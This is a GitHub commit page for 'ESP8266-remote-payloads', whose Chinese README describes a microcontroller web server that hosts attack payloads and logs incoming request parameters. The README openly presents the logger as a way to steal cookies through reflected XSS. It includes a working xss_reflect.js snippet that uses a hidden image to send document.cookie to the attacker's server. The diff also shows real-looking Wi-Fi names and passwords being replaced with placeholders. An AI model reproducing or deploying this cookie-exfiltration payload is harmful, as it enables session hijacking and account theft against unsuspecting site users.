README

wang606 · Jun 8, 2021 · 9fc8e2c · 9fc8e2c
1 parent 8c0d68f
commit 9fc8e2c
Show file tree

Hide file tree

Showing 12 changed files with 66 additions and 3 deletions.
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1 @@
+/hiden/
diff --git a/README b/README
@@ -0,0 +1,62 @@
+# ESP8266-remote-payloads
+
+### esp8266闪存文件应用
+
+<a href="https://www.bilibili.com/video/BV1L7411c7jw?p=8">详见太极创客</a>
+
+### 使用的esp8266模块：
+
+其他esp8266模块或开发板应该也行，只要有flash和WebServer库即可。
+
+![esp8266.jpg](https://i.loli.net/2021/06/08/Vrw95y4LY1kzfAH.jpg)
+
+![esp8266.jpg](./img/esp8266.jpg)
+
+### /index.html页面：
+
+![/index.html](https://i.loli.net/2021/06/08/5CoSbF3MKuztxWl.png)
+
+![/index.html](./img/index.html.png)
+
+### /upload.html页面：
+
+上传的文件将被存储在“/payloads/”根目录下。
+
+![upload.html](https://i.loli.net/2021/06/08/mM9sjIRXbLViqdW.png)
+
+![/upload.html](./img/upload.html.png)
+
+### /delete.html页面：
+
+只需要输入文件名如“logs”即可删除“/payloads/”+文件名如“/payloads/logs”文件，文件名不能包含“..”！
+
+![/delete.html](https://i.loli.net/2021/06/08/f3bDPRt5yzhEQu2.png)
+
+![/delete.html](./img/delete.html.png)
+
+### /list操作：
+
+列出/payloads/根目录下的所有文件夹和文件。
+
+![/list](https://i.loli.net/2021/06/08/t3L1FzMJRN2GAni.png)
+
+![/list](./img/list.png)
+
+### /logs操作：
+
+参数（GET或POST）将会被追加在/payloads/logs文件中，用于反射型XSS漏洞获取Cookie等。
+
+xss_reflect.js举例：
+
+```js
+//通过指定的名称'img'创建img元素
+var img = document.createElement('img');
+img.width = 0;
+img.height = 0;
+
+//将img元素的src属性指向脚本文件xss_reflect.php
+//将cookie信息的字符串作为URI组件进行编码，然后用ck参数传递
+img.src = 'http://192.168.1.103/logs?cookie='+encodeURIComponent(document.cookie);
+//将192.168.1.103换成你esp8266服务器的地址
+```
+
diff --git a/img/delete.html.png b/img/delete.html.png
diff --git a/img/esp8266.jpg b/img/esp8266.jpg
diff --git a/img/index.html.png b/img/index.html.png
diff --git a/img/list.png b/img/list.png
diff --git a/img/upload.html.png b/img/upload.html.png
diff --git a/data/delete.html → remote_payloads/data/delete.html b/data/delete.html → remote_payloads/data/delete.html
diff --git a/data/index.html → remote_payloads/data/index.html b/data/index.html → remote_payloads/data/index.html
@@ -10,7 +10,7 @@
 	<center>
     <h1>ESP8266 Remote Payloads</h1>
     <p>all payloads are in /payloads folder. <br/>
-	args behind GET request "/logs?" will be stored in /payloads/logs which can be used in XSS-reflection.</p>
+	args in request "/logs" will be stored in /payloads/logs which can be used in XSS-reflection.</p>
     <p> <a href="/upload.html">click to upload payloads</a> </p>
     <p> <a href="/list">click to list payloads</a> </p>
     <p> <a href="/delete.html">click to delete payload</a> </p>

diff --git a/data/payloads/xss_reflect.js → remote_payloads/data/payloads/xss_reflect.js b/data/payloads/xss_reflect.js → remote_payloads/data/payloads/xss_reflect.js
diff --git a/data/upload.html → remote_payloads/data/upload.html b/data/upload.html → remote_payloads/data/upload.html
diff --git a/remote_payloads.ino → remote_payloads/remote_payloads.ino b/remote_payloads.ino → remote_payloads/remote_payloads.ino
@@ -19,8 +19,8 @@ void setup() {
   //打开串口
   Serial.begin(9600);
   //联网
-  wifier.addAP("TP-LINK_885D", "234wqhlthtklzhr");
-  wifier.addAP("wangqinghua-AP", "wangqinghua-AP-master");
+  wifier.addAP("wifi_1_name", "wifi_1_password");
+  wifier.addAP("wifi_2_name", "wifi_2_password");
   Serial.print("Connecting to ");
   int i = 0;
   while (wifier.run() != WL_CONNECTED) {